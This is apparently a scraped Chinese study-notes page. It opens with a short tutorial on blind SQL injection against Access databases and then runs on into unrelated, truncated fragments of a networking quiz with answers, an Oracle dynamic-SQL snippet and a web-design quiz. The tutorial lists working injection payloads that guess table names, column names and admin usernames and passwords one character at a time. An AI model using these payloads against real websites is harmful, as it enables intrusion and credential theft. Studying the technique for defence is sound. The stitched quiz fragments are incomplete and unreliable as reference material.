sql注入定義:
將使用者輸入的內容,拼接到sql語句中,一起提交到資料庫 產生sql注入威脅。
$id= $_get['id']
$id= $_post['id']
access注入基本流程:
▪1.判斷有無注入
▪2.猜解表名
▪3.猜解字段
▪4.猜解管理員id值
▪5.猜解使用者名稱和密碼長度
▪6.猜解使用者名稱和密碼
逐字猜解法
▪1、判斷有無注入點▪and 1=1 and 1=2
▪2、猜表名(一般的表的名稱無非是admin adminuseruser pass password 等) ▪and (select count(*) from 表名)<>0 ▪and exists (select * from 表名)
▪3、猜列名▪and (select count(列名) from 表名)<>0 ▪and exists (select 列名from 表名)逐字猜解法
▪4、判斷內容長度▪and (select top 1 len(user_name) from admin)=5(user_name的長度=5,正常則=5,也可以,號去判斷)
▪5、擷取字串並轉換為ascii碼進行數值比較,判斷ascii碼值:
▪and (select top 1 asc(mid(user_name,1,1)) from admin)=97 判斷第一位(97代表『a』的ascll值)
▪and (select top 1 asc(mid(user_name,2,1)) from admin)=97 判斷第二位
資料庫 預設的資料庫
為什麼要使用資料庫?
靜態網頁 html 不需要伺服器解析指令碼 不依賴資料庫
第四章測試
1.以下關於csma cd傳送流程的描述中,錯誤的是 答案 先發後聽 2.以下關於交換機 逆向位址學習 方法的描述中,錯誤的是 答案 每次加入或更新 表時,加入或更改的表項被賦予乙個ip位址 3.以下關於生成樹協議作用的描述中,錯誤的是 答案 生成樹協議是一種路由選擇協議 4.在二進位制指數後退演算...
第四章 sql 動態查詢
declare va number 10 vb number 5 begin execute immediate create table temp1 a number 10 b number 5 execute immediate select a b from temp1 into va,vb ...
網頁製作 第四章測試
第1部分 總題數 7 單選題 2分 為div設定類a與b,應編寫html a.div.a,b b.div a,b c.div a,div b d.div.a,div.b 本題總得分2分 單選題 2分 在css中不屬於新增在當前頁面的形式是 a.層疊式樣式表 b.鏈結式樣式表 c.嵌入式樣式表 d.內...